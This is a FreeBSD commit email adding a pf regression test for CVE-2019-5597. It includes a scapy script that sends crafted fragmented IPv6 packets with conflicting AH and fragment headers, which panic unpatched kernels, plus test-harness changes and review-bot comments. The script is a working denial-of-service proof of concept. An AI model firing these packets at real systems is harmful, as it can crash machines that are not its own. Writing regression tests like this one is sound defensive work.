svn commit: r344793 - stable/12/tests/sys/netpfil/pf
Kristof Provost
kp at FreeBSD.org
Tue Mar 5 08:45:08 UTC 2019
Author: kp
Date: Tue Mar 5 08:45:07 2019
New Revision: 344793
URL: https://svnweb.freebsd.org/changeset/base/344793
Log:
MFC r344692:
pf tests: Test CVE-2019-5597
Generate a fragmented packet with different header chains, to provoke
the incorrect behaviour of pf.
Without the fix this will trigger a panic.
Obtained from: Corentin Bayet, Nicolas Collignon, Luca Moro at Synacktiv
Added:
stable/12/tests/sys/netpfil/pf/CVE-2019-5597.py
- copied unchanged from r344692, head/tests/sys/netpfil/pf/CVE-2019-5597.py
Modified:
stable/12/tests/sys/netpfil/pf/Makefile
stable/12/tests/sys/netpfil/pf/fragmentation.sh
Directory Properties:
stable/12/ (props changed)
Copied: stable/12/tests/sys/netpfil/pf/CVE-2019-5597.py (from r344692, head/tests/sys/netpfil/pf/CVE-2019-5597.py)
==============================================================================
--- /dev/null 00:00:00 1970 (empty, because file is newly added)
+++ stable/12/tests/sys/netpfil/pf/CVE-2019-5597.py Tue Mar 5 08:45:07 2019 (r344793, copy of r344692, head/tests/sys/netpfil/pf/CVE-2019-5597.py)
@@ -0,0 +1,35 @@
+#!/usr/local/bin/python2.7
+
+import random
+import scapy.all as sp
+import sys
+
+UDP_PROTO = 17
+AH_PROTO = 51
+FRAG_PROTO = 44
+
+def main():
+ intf = sys.argv[1]
+ ipv6_src = sys.argv[2]
+ ipv6_dst = sys.argv[3]
+
+ ipv6_main = sp.IPv6(dst=ipv6_dst, src=ipv6_src)
+
+ padding = 8
+ fid = random.randint(0,100000)
+ frag_0 = sp.IPv6ExtHdrFragment(id=fid, nh=UDP_PROTO, m=1, offset=0)
+ frag_1 = sp.IPv6ExtHdrFragment(id=fid, nh=UDP_PROTO, m=0, offset=padding/8)
+
+ pkt1_opts = sp.AH(nh=AH_PROTO, payloadlen=200) \
+ / sp.Raw('XXXX' * 199) \
+ / sp.AH(nh=FRAG_PROTO, payloadlen=1) \
+ / frag_1
+
+ pkt0 = sp.Ether() / ipv6_main / frag_0 / sp.Raw('A' * padding)
+ pkt1 = sp.Ether() / ipv6_main / pkt1_opts / sp.Raw('B' * padding)
+
+ sp.sendp(pkt0, iface=intf, verbose=False)
+ sp.sendp(pkt1, iface=intf, verbose=False)
+
+if __name__ == '__main__':
+ main()
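Review bot: offset=padding/8 on the frag_1 line only produces an integer because the shebang pins python2.7; under Python 3 the same expression is a float. Writing it as padding // 8 keeps the value at 1 on either interpreter. main() also reads sys.argv[1] through sys.argv[3] without checking the argument count, so a wrong invocation ends in an IndexError traceback rather than a usage message. Finally, payloadlen=200, 'XXXX' * 199 and the second AH with payloadlen=1 carry no comment, and a short one saying how these lengths produce the differing header chains the log message mentions would help whoever has to maintain this test later.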
Modified: stable/12/tests/sys/netpfil/pf/Makefile
==============================================================================
--- stable/12/tests/sys/netpfil/pf/Makefile Tue Mar 5 08:33:14 2019 (r344792)
+++ stable/12/tests/sys/netpfil/pf/Makefile Tue Mar 5 08:45:07 2019 (r344793)
@@ -19,8 +19,10 @@ ATF_TESTS_SH+= anchor \
${PACKAGE}FILES+= utils.subr \
echo_inetd.conf \
- pft_ping.py
+ pft_ping.py \
+ CVE-2019-5597.py
${PACKAGE}FILESMODE_pft_ping.py= 0555
+${PACKAGE}FILESMODE_CVE-2019-5597.py= 0555
.include <bsd.test.mk>
Modified: stable/12/tests/sys/netpfil/pf/fragmentation.sh
==============================================================================
--- stable/12/tests/sys/netpfil/pf/fragmentation.sh Tue Mar 5 08:33:14 2019 (r344792)
+++ stable/12/tests/sys/netpfil/pf/fragmentation.sh Tue Mar 5 08:45:07 2019 (r344793)
@@ -104,6 +104,11 @@ v6_body()
atf_check -s exit:0 -o ignore\
ping6 -c 1 -b 70000 -s 65000 2001:db8:43::3
+
+ $(atf_get_srcdir)/CVE-2019-5597.py \
+ ${epair_send}a \
+ 2001:db8:42::1 \
+ 2001:db8:43::3
}
v6_cleanup()
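Review bot: the new CVE-2019-5597.py call in v6_body() is not wrapped in atf_check, unlike the ping6 invocation directly above it, so a non-zero exit from the script (failed scapy import, wrong interface name, missing interpreter) is ignored and the test still passes without having sent the fragments. Running it as atf_check -s exit:0 -o ignore $(atf_get_srcdir)/CVE-2019-5597.py ... would make that failure visible. Since the pass criterion in the log message is the absence of a panic, a one-line comment above the call saying so would also document why no reply is checked afterwards.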